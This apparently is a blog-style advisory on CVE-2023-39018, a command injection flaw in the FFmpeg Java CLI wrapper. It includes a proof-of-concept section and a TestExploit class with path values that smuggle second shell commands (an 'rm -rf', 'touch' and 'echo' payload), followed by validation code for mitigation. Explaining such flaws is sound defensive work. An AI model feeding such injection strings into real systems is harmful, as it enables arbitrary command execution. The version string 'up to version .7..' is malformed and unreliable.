In 2023, security researchers discovered a critical vulnerability affecting the FFmpeg Java wrapper up to version .7.. This vulnerability, tracked as CVE-2023-39018, allows attackers to execute arbitrary code on hosts running vulnerable code, simply by passing unchecked arguments. If you're using libraries such as net.bramp.ffmpeg.FFmpeg in your Java projects, understanding and patching this flaw is urgent. In this post, we'll break down how the issue works, walk through a simple exploit, and link to authoritative references.

Vulnerability type: Code injection via command-line arguments

- CVE: CVE-2023-39018

Root Cause: The problem is in the way the FFmpeg constructor passes arguments directly to the underlying OS shell when constructing and launching processes. Malicious input isn't sanitized, letting an attacker inject extra commands.

A common usage of the library looks like this:

import net.bramp.ffmpeg.FFmpeg;
...
FFmpeg ffmpeg = new FFmpeg("/usr/bin/ffmpeg");

You might think the path parameter is safe, but in vulnerable versions, if an attacker can supply or influence this argument, extra shell commands can slip through.

For example, vulnerable code might look like:

String userProvidedPath = request.getParameter("ffmpeg_path");
FFmpeg ffmpeg = new FFmpeg(userProvidedPath);

If an attacker submits a path like:

/usr/bin/ffmpeg; rm -rf /tmp/hacked

The code will spawn a process that runs /usr/bin/ffmpeg, then deletes everything inside /tmp/hacked.

Proof of Concept Exploit

Suppose you have a web application that allows a user to specify the path to ffmpeg via a form. With the following code:

String ffmpegPath = request.getParameter("ffmpeg_path");  // User controlled!
FFmpeg ffmpeg = new FFmpeg(ffmpegPath);

An attacker posts:

/usr/bin/ffmpeg; touch /tmp/owned_by_cve_2023_39018

Result: Your server creates a file /tmp/owned_by_cve_2023_39018, showing arbitrary commands can run.

Demo Code

public class TestExploit {
    public static void main(String[] args) throws Exception {
        String injectedPath = "/usr/bin/ffmpeg; echo HACKED > /tmp/cve_2023_39018";
        FFmpeg ffmpeg = new FFmpeg(injectedPath);
        ffmpeg.version();  // This causes the command to execute
    }
}

After running, check for the file:

cat /tmp/cve_2023_39018
# Output will show: HACKED

Why Is This Dangerous?

- Remote Code Execution (RCE): If user input reaches the FFmpeg constructor, an attacker could run any command with the privileges of the Java application.
- Wide Impact: FFmpeg is used in video processing, transcoding, and media pipeline servers, often as backend services.

Official References

- CVE Database: NVD - CVE-2023-39018
- FFmpeg Java Wrapper Project: https://github.com/bramp/ffmpeg-cli-wrapper
- Related fix and discussions: Security advisory #147


How To Fix / Mitigation

- Hardcode the path to ffmpeg if possible.
- If configuration is needed, allow admins only and check for valid paths (e.g., using Files.exists() and a regex to allow only expected binaries).

import java.io.File;
import java.io.IOException;
import net.bramp.ffmpeg.FFmpeg;

// Safe usage: the path is hardcoded, never taken from a request, and checked before use
String ffmpegPath = "/usr/bin/ffmpeg";
if (new File(ffmpegPath).exists()) {
    FFmpeg ffmpeg = new FFmpeg(ffmpegPath);  // declared to throw IOException if the binary cannot be run
} else {
    throw new SecurityException("Invalid ffmpeg path");
}
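The snippet above only checks that the file exists. Below is an added example (not from the wrapper project) of the fuller check the mitigation bullets describe for an admin-configured path: a character allowlist that rejects shell metacharacters, symlink resolution, an allowlist of expected binaries, and an executable-file check before the wrapper is constructed. The class name FfmpegLocator, the allowed paths and the sample inputs are assumptions chosen for this example.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Set;
import java.util.regex.Pattern;

import net.bramp.ffmpeg.FFmpeg;

public final class FfmpegLocator {
    // Deployment-specific allowlist (assumed here): the only binaries this service may launch.
    private static final Set<String> ALLOWED = Set.of("/usr/bin/ffmpeg", "/usr/local/bin/ffmpeg");
    // Absolute path built only from characters a binary path needs; rejects ';', '|', '&', '$', spaces, etc.
    private static final Pattern SAFE_PATH = Pattern.compile("^/[A-Za-z0-9._/-]+$");

    /** Validates an operator-supplied path and returns a wrapper bound to it, or throws. */
    public static FFmpeg locate(String configuredPath) throws IOException {
        if (configuredPath == null || !SAFE_PATH.matcher(configuredPath).matches()) {
            throw new SecurityException("ffmpeg path contains disallowed characters");
        }
        // Resolve symlinks and ".." so the allowlist is compared against the real target.
        Path real = Paths.get(configuredPath).toRealPath();
        if (!ALLOWED.contains(real.toString())) {
            throw new SecurityException("ffmpeg path is not on the allowlist: " + real);
        }
        if (!Files.isRegularFile(real) || !Files.isExecutable(real)) {
            throw new SecurityException("ffmpeg path is not an executable file: " + real);
        }
        return new FFmpeg(real.toString());
    }

    public static void main(String[] args) {
        // Constructed inputs: a legitimate path and the injection string quoted earlier in the post.
        String[] candidates = { "/usr/bin/ffmpeg", "/usr/bin/ffmpeg; touch /tmp/owned_by_cve_2023_39018" };
        for (String candidate : candidates) {
            try {
                FFmpeg ffmpeg = locate(candidate);
                System.out.println("accepted " + candidate + " -> " + ffmpeg.version());
            } catch (SecurityException | IOException e) {
                System.out.println("rejected " + candidate + ": " + e.getMessage());
            }
        }
    }
}
```

The second candidate is rejected by the regex before any process is created; a path that exists but is not in ALLOWED is rejected after symlink resolution. If your ffmpeg lives at a path containing spaces, keep the allowlist comparison and widen only the character set, never drop the check.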

Conclusion

CVE-2023-39018 is a serious code injection issue. The simplest way to stay secure is to update your dependencies immediately and restrict user-supplied arguments. If you develop or deploy video processing apps in Java, double-check your use of the FFmpeg CLI wrapper.

More Reading

- Secure Coding Guidelines - OWASP Command Injection
- ProcessBuilder and Runtime.exec() security
- Bramp FFmpeg CLI Wrapper Releases

Timeline

Published on: 07/28/2023 15:15:00 UTC
Last modified on: 08/03/2023 18:04:00 UTC